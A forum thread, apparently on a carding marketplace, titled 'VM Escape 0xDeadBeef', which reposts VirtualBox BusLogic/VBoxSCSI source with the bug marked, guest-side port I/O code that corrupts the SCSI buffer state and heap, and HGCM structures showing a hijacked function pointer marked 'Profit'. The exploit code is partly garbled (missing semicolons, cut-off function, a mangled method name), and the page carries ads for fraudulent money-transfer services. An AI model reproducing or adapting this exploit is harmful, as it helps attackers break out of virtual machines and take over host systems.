Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | WesternUnion Tracking

carding forums carding forums
revolut carding carding forums
carding forums carding forums
carding forums

Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
VM Escape 0xDeadBeef
#1
// /src/VBox/Devices/Storage/DevBusLogic.cpp

// [...]

if (fBootable)
{
/* Register I/O port space for BIOS access. */
rc = PDMDevHlpIoPortCreateExAndMap(pDevIns, BUSLOGIC_BIOS_IO_PORT, 4 /*cPorts*/, 0 /*fFlags*/,
buslogicR3BiosIoPortWrite, // Write a byte
buslogicR3BiosIoPortRead, // Read a byte
buslogicR3BiosIoPortWriteStr, // Write a string
buslogicR3BiosIoPortReadStr, // Read a string
NULL /*pvUser*/,
"BusLogic BIOS" , NULL /*paExtDesc*/, &pThis->hIoPortsBios);
// [...]
}
// [...]

// src/VBox/Devices/Storage/VBoxSCSI.cpp

/**
* @retval VINF_SUCCESS
*/
int vboxscsiReadString(PPDMDEVINS pDevIns, PVBOXSCSI pVBoxSCSI, uint8_t iRegister,
uint8_t *pbDst, uint32_t *pcTransfers, unsigned cb)
{
RT_NOREF(pDevIns);
LogFlowFunc(("pDevIns=%#p pVBoxSCSI=%#p iRegister=%d cTransfers=%u cb=%u\n",
pDevIns, pVBoxSCSI, iRegister, *pcTransfers, cb));

/*
* Check preconditions, fall back to non-string I/O handler.
*/
Assert(*pcTransfers > 0);

/* Read string only valid for data in register. */
AssertMsgReturn(iRegister == 1, ("Hey! Only register 1 can be read from with string!\n"), VINF_SUCCESS);

/* Accesses without a valid buffer will be ignored. */
AssertReturn(pVBoxSCSI->pbBuf, VINF_SUCCESS);

/* Check state. */
AssertReturn(pVBoxSCSI->enmState == VBOXSCSISTATE_COMMAND_READY, VINF_SUCCESS);
Assert(!pVBoxSCSI->fBusy);

RTCritSectEnter(&pVBoxSCSI->CritSect);
/*
* Also ignore attempts to read more data than is available.
*/
uint32_t cbTransfer = *pcTransfers * cb;
if (pVBoxSCSI->cbBufLeft > 0)
{
Assert(cbTransfer <= pVBoxSCSI->cbBuf); // --- [1] ---
if (cbTransfer > pVBoxSCSI->cbBuf)
{
memset(pbDst + pVBoxSCSI->cbBuf, 0xff, cbTransfer - pVBoxSCSI->cbBuf);
cbTransfer = pVBoxSCSI->cbBuf; /* Ignore excess data (not supposed to happen). */
}

/* Copy the data and adance the buffer position. */
memcpy(pbDst,
pVBoxSCSI->pbBuf + pVBoxSCSI->iBuf, // --- [2] ---
cbTransfer);

/* Advance current buffer position. */
pVBoxSCSI->iBuf += cbTransfer;
pVBoxSCSI->cbBufLeft -= cbTransfer; // --- [3] ---

/* When the guest reads the last byte from the data in buffer, clear
everything and reset command buffer. */

if (pVBoxSCSI->cbBufLeft == 0) // --- [4] ---
vboxscsiReset(pVBoxSCSI, false /*fEverything*/);
}
else
{
AssertFailed();
memset(pbDst, 0, cbTransfer);
}
*pcTransfers = 0;
RTCritSectLeave(&pVBoxSCSI->CritSect);

return VINF_SUCCESS;
}

Here’s how we triggered the bug:
void exploit() {
static const uint8_t cdb[1] = {0};
static const short port = 0x434;
static const uint32_t buffer_size = 1024;

// reset the state machine
__outbyte(port+3, 0);

// initiate a write operation
__outbyte(port+0, 0); // TargetDevice (0)
__outbyte(port+0, 1); // direction (to device)

__outbyte(port+0, ((buffer_size >> 12) & 0xf0) | (sizeof(cdb) & 0xf)); // buffer length hi & cdb length
__outbyte(port+0, buffer_size); // bugger length low
__outbyte(port+0, buffer_size >> 8); // buffer length mid

for(int i = 0; i < sizeof(cdb); i++)
__outbyte(port+0, cdb[i]);


// move the buffer pointer to 8 byte after the buffer and the remaining bytes to -8
char buf[buffer_size];
__inbytestring(port+1, buf, buffer_size - 1) // Read bufsize-1
__inbytestring(port+1, buf, 9) // Read 9 more bytes

for(int i = 0; i < sizeof(buf); i += 4)
*((uint32_t*)(&buf[i])) = 0xdeadbeef
for(int i = 0; i < 10000; i++)
__outbytestring(port+1, buf, sizeof(buf))
enum operations {
OPERATION_OUTBYTE = 0,
OPERATION_INBYTE = 1,
OPERATION_OUTSTR = 2,
OPERATION_INSTR = 3,
};

typedef struct {
volatile unsigned int port;
volatile unsigned int operation;
volatile unsigned int data_byte_out;
} Req;
class HGCMMsgCall: public HGCMMsgHeader
{
// A list of parameters including a
// char[] with controlled contents
VBOXHGCMSVCPARM *paParms;

// [...]
};

class HGCMMsgHeader: public HGCMMsgCore
{
public:
// [...]
/* Port to be informed on message completion. */
PPDMIHGCMPORT pHGCMPort;
};

typedef struct PDMIHGCMPORT
{
// [...]
/**
* Checks if @a pCmd was cancelled.
*
* @returns true if cancelled, false if not.
* @param pInterface Pointer to this interface.
* @param pCmd The command we're checking on.
*/
DECLR3CALLBACKMEMBER(bool, pfnIsCmdCancelled,(PPDMIHGCMPORT pInterface, PVBOXHGCMCMD pCmd));
// [...]

} PDMIHGCMPORT;

class HGCMMsgCore : public HGCMReferencedObject
{
private:
// [...]
/** Next element in a message queue. */
HGCMMsgCore *m_pNext;
/** Previous element in a message queue.
* @todo seems not necessary. */
HGCMMsgCore *m_pPrev;
// [...]
};
/**
* @interface_method_impl{VBOXHGCMSVCHELPERS,pfnIsCallCancelled}
*/
/* static */ DECLCALLBACK(bool) HGCMService:ConfusedvcHlpIsCallCancelled(VBOXHGCMCALLHANDLE callHandle)
{
HGCMMsgHeader *pMsgHdr = (HGCMMsgHeader *)callHandle;
AssertPtrReturn(pMsgHdr, false);

PVBOXHGCMCMD pCmd = pMsgHdr->pCmd;
AssertPtrReturn(pCmd, false);

PPDMIHGCMPORT pHgcmPort = pMsgHdr->pHGCMPort; // We corrupted pHGCMPort
AssertPtrReturn(pHgcmPort, false);

return pHgcmPort->pfnIsCmdCancelled(pHgcmPort, pCmd); // --- Profit ---
}
Reply
Paid adv. expire in 31 days
CLICK to buy Advertisement !

    Verified & Trusted WesternUnion / MoneyGram / Bank - Transferring -WorldWide [ MTCN in 3 hours ]

  


Forum Jump:


Contributors: Henryabach